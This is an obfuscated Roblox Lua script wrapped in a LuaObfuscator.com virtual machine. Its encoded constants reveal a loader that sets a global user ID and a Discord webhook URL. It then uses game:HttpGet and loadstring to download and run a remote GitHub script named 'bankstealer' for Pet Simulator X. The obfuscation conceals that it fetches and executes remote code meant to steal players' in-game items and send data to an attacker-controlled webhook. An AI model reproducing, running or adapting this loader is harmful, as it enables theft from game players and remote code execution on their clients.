--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==3) then v24=nil;function v24()local v31=0 -0 ;local v32;local v33;local v34;local v35;while true do if (v31==(2 -1)) then return (v35 * 16777216) + (v34 * 65536) + (v33 * (493 -237)) + v32 ;end if (v31==(0 -0)) then v32,v33,v34,v35=v1(v16,v19,v19 + (622 -((1123 -(367 + 201)) + (991 -(214 + 713)))) );v19=v19 + (935 -(857 + 74)) ;v31=1;end end end v25=nil;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v36)if (v1(v36,2)==79) then v20=v0(v3(v36,1,1));return "";else local v68=v2(v0(v36,16));if v20 then local v75=0;local v76;while true do if (v75==0) then v76=v5(v68,v20);v20=nil;v75=1;end if (1==v75) then return v76;end end else return v68;end end end);v18=1;end if (v18==1) then v21=nil;function v21(v37,v38,v39)if v39 then local v69=(v37/((1 + 1)^(v38-((1 -0) + (0 -0)))))%((879 -(282 + 595))^(((v39-(1638 -((1873 -(87 + 263)) + 114))) -(v38-(1 + 0))) + (1 -0))) ;return v69-(v69%(1066 -(68 + 997))) ;else local v70=(3029 -1759) -(226 + (1224 -(67 + 113))) ;local v71;while true do if (v70==(0 -0)) then v71=(119 -(32 + 85))^(v38-(1 + 0)) ;return (((v37%(v71 + v71))>=v71) and (1 + 0)) or (957 -(892 + 65)) ;end end end end v22=nil;v18=2;end if (v18==2) then function v22()local v40=v1(v16,v19,v19);v19=v19 + 1 ;return v40;end v23=nil;function v23()local v41,v42=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (4 -2) ;return (v42 * 256) + v41 ;end v18=3;end if (v18==6) then v29=nil;function v29()local v43=156 -(142 + 14) ;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43~=(1793 -(1563 + 230))) then else v44=285 -(134 + 151) ;v45=nil;v43=1666 -(970 + 695) ;end if (v43==1) then v46=nil;v47=nil;v43=3 -1 ;end if (v43==3) then v50=nil;while true do local v77=0;while true do if (v77==1) then if (v44==(1990 -(582 + 1408))) then local v103=0 -0 ;while true do if (v103==(0 -0)) then v45={};v46={};v103=1;end if (v103~=(3 -2)) then else v47={};v44=1825 -(1195 + 629) ;break;end end end if (v44==(1 -0)) then v48={v45,v46,nil,v47};v49=v24();v50={};v44=2 + 0 ;end break;end if (v77~=0) then else if (v44==2) then local v104=0 + 0 ;while true do if (v104~=(0 -0)) then else for v107=1,v49 do local v108=0 -0 ;local v109;local v110;local v111;local v112;while true do if (v108==(0 + 0)) then v109=1636 -(1373 + 263) ;v110=nil;v108=1;end if (v108~=(1002 -(451 + 549))) then else while true do if (v109==(1 + 0)) then v112=nil;while true do if (v110==(1 -0)) then if (v111==1) then v112=v22()~=(0 -0) ;elseif (v111==2) then v112=v25();elseif (v111==(1387 -(746 + 638))) then v112=v26();end v50[v107]=v112;break;end if (v110==(0 + 0)) then local v179=0 -0 ;while true do if (v179==(342 -(218 + 123))) then v110=1582 -(1535 + 46) ;break;end if (v179~=0) then else v111=v22();v112=nil;v179=1 + 0 ;end end end end break;end if (v109==(0 + 0)) then local v156=0;while true do if ((561 -(306 + 254))~=v156) then else v109=1;break;end if (v156==(0 + 0)) then v110=0 -0 ;v111=nil;v156=1;end end end end break;end if (v108==1) then v111=nil;v112=nil;v108=2;end end end v48[3]=v22();v104=1468 -(899 + 568) ;end if (v104~=1) then else for v113=1,v24() do local v114=0;local v115;local v116;local v117;local v118;while true do if ((2 + 0)==v114) then while true do if (v115==1) then v118=nil;while true do if ((0 -0)~=v116) then else local v180=603 -(268 + 335) ;while true do if (v180==1) then v116=291 -(60 + 230) ;break;end if (v180==0) then local v183=0;while true do if (v183~=(572 -(426 + 146))) then else v117=0 + 0 ;v118=nil;v183=1457 -(282 + 1174) ;end if (v183==1) then v180=1;break;end end end end end if ((812 -(569 + 242))~=v116) then else while true do if (v117==(0 -0)) then v118=v22();if (v21(v118,1,1 + 0 )==(1024 -(706 + 318))) then local v184=0;local v185;local v186;local v187;local v188;local v189;local v190;while true do if (v184~=(1252 -(721 + 530))) then else v187=nil;v188=nil;v184=1273 -(945 + 326) ;end if (v184==0) then v185=0 -0 ;v186=nil;v184=1;end if (v184==2) then v189=nil;v190=nil;v184=3;end if (3==v184) then while true do if (v185==2) then v190=nil;while true do if ((0 + 0)==v186) then local v192=0;while true do if (v192==0) then v187=700 -(271 + 429) ;v188=nil;v192=1 + 0 ;end if (v192==(1501 -(1408 + 92))) then v186=1087 -(461 + 625) ;break;end end end if (v186~=1) then else v189=nil;v190=nil;v186=2;end if (v186~=(1290 -(993 + 295))) then else while true do if (v187==(1 + 2)) then if (v21(v189,1174 -(418 + 753) ,3)~=(1 + 0)) then else v190[1 + 3 ]=v50[v190[2 + 2 ]];end v45[v113]=v190;break;end if (v187==(1 + 1)) then local v194=529 -(406 + 123) ;local v195;while true do if (v194==0) then v195=1769 -(1749 + 20) ;while true do if (v195==(0 + 0)) then local v203=1322 -(1249 + 73) ;while true do if (v203~=1) then else v195=1 + 0 ;break;end if (v203==0) then if (v21(v189,1,1)==1) then v190[2]=v50[v190[2]];end if (v21(v189,1147 -(466 + 679) ,4 -2 )~=1) then else v190[3]=v50[v190[8 -5 ]];end v203=1;end end end if (v195~=(1901 -(106 + 1794))) then else v187=1 + 2 ;break;end end break;end end end if (v187==0) then local v196=0 + 0 ;while true do if (v196==1) then v187=2 -1 ;break;end if (0==v196) then local v200=0;local v201;while true do if ((0 -0)~=v200) then else v201=0;while true do if (v201~=0) then else local v208=114 -(4 + 110) ;while true do if (v208==(584 -(57 + 527))) then v188=v21(v118,2,1430 -(41 + 1386) );v189=v21(v118,4,6);v208=104 -(17 + 86) ;end if (v208~=(1 + 0)) then else v201=1 -0 ;break;end end end if (v201~=(2 -1)) then else v196=167 -(122 + 44) ;break;end end break;end end end end end if (v187==(1 -0)) then local v197=0;while true do if ((3 -2)==v197) then v187=2;break;end if (v197==0) then local v202=0 + 0 ;while true do if (v202==1) then v197=1 + 0 ;break;end if (v202==0) then v190={v23(),v23(),nil,nil};if (v188==0) then local v204=1257 -(1043 + 214) ;local v205;local v206;local v207;while true do if (v204==(0 -0)) then v205=1212 -(323 + 889) ;v206=nil;v204=1;end if (v204~=(2 -1)) then else v207=nil;while true do if ((581 -(361 + 219))~=v205) then else while true do if (v206==(320 -(53 + 267))) then v207=0;while true do if (v207~=(0 + 0)) then else v190[3]=v23();v190[417 -(15 + 398) ]=v23();break;end end break;end end break;end if (v205~=0) then else local v215=0;while true do if (v215~=(983 -(18 + 964))) then else v205=1;break;end if (v215==0) then v206=0;v207=nil;v215=1;end end end end break;end end elseif (v188==1) then v190[11 -8 ]=v24();elseif (v188==(2 + 0)) then v190[2 + 1 ]=v24() -((852 -(20 + 830))^16) ;elseif (v188==(3 + 0)) then local v216=126 -(116 + 10) ;local v217;local v218;while true do if (v216==0) then v217=0 + 0 ;v218=nil;v216=739 -(542 + 196) ;end if (v216==1) then while true do if (v217==(0 -0)) then v218=0 + 0 ;while true do if ((0 + 0)==v218) then v190[2 + 1 ]=v24() -((4 -2)^(40 -24)) ;v190[4]=v23();break;end end break;end end break;end end end v202=1;end end end end end end break;end end break;end if (v185~=0) then else v186=0;v187=nil;v185=1;end if ((1552 -(1126 + 425))==v185) then local v191=0;while true do if (v191==1) then v185=407 -(118 + 287) ;break;end if (v191~=0) then else v188=nil;v189=nil;v191=1;end end end end break;end end end break;end end break;end end break;end if (v115==0) then local v157=0;while true do if (v157==(0 -0)) then v116=0;v117=nil;v157=1;end if (v157==1) then v115=1;break;end end end end break;end if (v114==0) then v115=1121 -(118 + 1003) ;v116=nil;v114=1;end if ((2 -1)~=v114) then else v117=nil;v118=nil;v114=2;end end end v44=380 -(142 + 235) ;break;end end end if (v44==3) then local v105=0;while true do if ((0 -0)==v105) then for v119=1,v24() do v46[v119-(1 + 0) ]=v29();end return v48;end end end v77=1;end end end break;end if (v43~=(979 -(553 + 424))) then else v48=nil;v49=nil;v43=5 -2 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v51=v24();local v52=v24();local v53=1 + 0 ;local v54=(v21(v52,1 + 0 ,(1142 -(369 + 761)) + 8 ) * (2^(9 + 5 + 18))) + v51 ;local v55=v21(v52,21,18 + 13 );local v56=((v21(v52,69 -37 )==(2 -1)) and  -(1 -0)) or (2 -1) ;if (v55==0) then if (v54==((0 -0) + 0)) then return v56 * (0 -0) ;else v55=754 -(239 + 514) ;v53=0 + 0 ;end elseif (v55==(3376 -(797 + 532))) then return ((v54==(0 + 0)) and (v56 * ((1 + 0)/(0 -0)))) or (v56 * NaN) ;end return v8(v56,v55-(2225 -(373 + 829)) ) * (v53 + (v54/(((971 -(64 + 174)) -(476 + 255))^52))) ;end v26=nil;function v26(v57)local v58=0;local v59;local v60;while true do if (v58==(1 + 2)) then return v6(v60);end if (v58==(0 -0)) then v59=nil;if  not v57 then local v94=336 -(144 + 192) ;while true do if (v94==(216 -(31 + 11 + 174))) then v57=v24();if (v57==(0 + 0)) then return "";end break;end end end v58=1;end if (v58==(2 + 0)) then v60={};for v78=1 + 0 , #v59 do v60[v78]=v2(v1(v3(v59,v78,v78)));end v58=1507 -(272 + 91 + (3116 -(1913 + 62))) ;end if (v58==1) then v59=v3(v16,v19,(v19 + v57) -(1581 -(1183 + 397)) );v19=v19 + v57 ;v58=(4 + 1) -3 ;end end end v18=5;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v80=v65;local v81=v66;local v82=v67;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v95=0,v88 do if (v95>=v82) then v86[v95-v82 ]=v87[v95 + 1 ];else v90[v95]=v87[v95 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v96=0;while true do if (v96==1) then if (v93<=10) then if (v93<=4) then if (v93<=1) then if (v93>0) then v90[v92[2]][v92[3]]=v92[4];else local v123=0;local v124;local v125;while true do if (v123==1) then v90[v124 + 1 ]=v125;v90[v124]=v125[v92[4]];break;end if (0==v123) then v124=v92[2];v125=v90[v92[3]];v123=1;end end end elseif (v93<=2) then v90[v92[2]]=v63[v92[3]];elseif (v93>3) then v90[v92[2]]=v63[v92[3]];elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=7) then if (v93<=5) then local v128=0;local v129;while true do if (0==v128) then v129=v92[2];v90[v129]=v90[v129](v13(v90,v129 + 1 ,v85));break;end end elseif (v93>6) then local v139=v92[2];local v140,v141=v83(v90[v139](v13(v90,v139 + 1 ,v92[3])));v85=(v141 + v139) -1 ;local v142=0;for v165=v139,v85 do local v166=0;while true do if (v166==0) then v142=v142 + 1 ;v90[v165]=v140[v142];break;end end end else v90[v92[2]]();end elseif (v93<=8) then v84=v92[3];elseif (v93==9) then v90[v92[2]]=v92[3];else local v145=0;local v146;while true do if (v145==0) then v146=v92[2];v90[v146]=v90[v146](v13(v90,v146 + 1 ,v85));break;end end end elseif (v93<=15) then if (v93<=12) then if (v93>11) then local v131=0;local v132;local v133;while true do if (v131==0) then v132=v92[2];v133=v90[v92[3]];v131=1;end if (v131==1) then v90[v132 + 1 ]=v133;v90[v132]=v133[v92[4]];break;end end else v90[v92[2]][v92[3]]=v92[4];end elseif (v93<=13) then do return;end elseif (v93>14) then v90[v92[2]]=v92[3]~=0 ;else v90[v92[2]]();end elseif (v93<=18) then if (v93<=16) then v90[v92[2]]=v92[3]~=0 ;elseif (v93>17) then do return;end else local v148=v92[2];local v149,v150=v83(v90[v148](v13(v90,v148 + 1 ,v92[3])));v85=(v150 + v148) -1 ;local v151=0;for v172=v148,v85 do v151=v151 + 1 ;v90[v172]=v149[v151];end end elseif (v93<=19) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93>20) then v90[v92[2]]=v92[3];else v84=v92[3];end v84=v84 + 1 ;break;end if (v96==0) then v92=v80[v84];v93=v92[1];v96=1;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F72582F6D61696E2F62616E6B737465616C657203023O005F4703063O00557365724944030A3O003438393833382O34313503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O34363135373234372O3136393O34372F66557046434D74715A6D785277344C6B3747555A6950703132614A637145555441334851697639724A4B6E6F745039784258656E522D56303876375974552O763064526300153O0012093O00013O0026033O000C000100020004083O000C0001001204000100033O001204000200043O00200C000200020005001209000400064O000F000500014O0007000200054O000A00013O00022O000E0001000100010004083O001400010026033O0001000100010004083O00010001001204000100073O003001000100080009001204000100073O0030010001000A000B0012093O00023O0004083O000100012O00123O00017O00",v9(),...);
